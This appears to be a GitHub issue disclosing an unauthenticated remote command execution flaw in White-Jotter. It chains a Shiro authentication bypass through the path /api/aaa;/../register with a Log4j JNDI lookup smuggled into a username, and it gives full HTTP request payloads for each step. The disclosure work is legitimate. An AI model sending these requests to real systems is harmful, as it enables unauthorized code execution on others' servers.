Skip to content

There is an Unauthenticated Remote Command Execution in White-Jotter #162

New issue
New issue
Open
Open
There is an Unauthenticated Remote Command Execution in White-Jotter#162
@Fushuling

Description

@Fushuling
Fushuling
opened on Sep 5, 2025

[Suggested description]
White-Jotter contains an unauthenticated remote command execution vulnerability caused by improper access control in Shiro configuration combined with unsafe log4j.

[Vulnerability Type]

Incorrect access control / Remote Code Execution (RCE)

[Vendor of Product]
https://github.com/Antabot/White-Jotter/

[Affected Product Code Base]
all version(up to 9bcadcf)

[Attack Type]
Remote, unauthenticated

[Vulnerability details]
First, refer to https://github.com/DYX217/Incorrect-Access-Control, we can use /api/aaa;/../+sensitive interface to bypass authentication.Here we can use the interface /api/aaa;/../register to unauthorizedly register a user named ${jndi:ldap://127.0.0.1:1389/Basic/Command/calc}.

POST /api/aaa;/../register HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:142.0) Gecko/20100101 Firefox/142.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/json;charset=utf-8
Content-Length: 128
Origin: http://localhost:8443
Sec-GPC: 1
Connection: close
Referer: http://localhost:8443/admin/user/profile
Priority: u=0

{"username":"${jndi:ldap://127.0.0.1:1389/Basic/Command/calc}","password":"111","name":"111","phone":"111","email":"[email protected]"}
Image

Then we use the username to log in and get the cookie

POST /api/login HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:142.0) Gecko/20100101 Firefox/142.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/json;charset=utf-8
Content-Length: 80
Origin: http://localhost:8443
Sec-GPC: 1
Connection: close
Referer: http://localhost:8443/login?redirect=%2Fadmin%2F
Priority: u=0

{"username":"${jndi:ldap://127.0.0.1:1389/Basic/Command/calc}","password":"111"}
Image

In onPreHandle, when a user accesses an interface that it does not have permission to access, log4j2 will be used to record the log, which is exactly what the attacker can exploit.

Image

The user we registered has very low permissions and cannot access the administrator-related interface. We only need to access an administrator's interface, such as /api/admin/content/article, to use log4j2 to implement rce

GET /api/admin/content/article HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:142.0) Gecko/20100101 Firefox/142.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Sec-GPC: 1
Connection: close
Cookie: JSESSIONID=B53F4730E1C34E707AA1FC5F7B388DBB
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Image

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions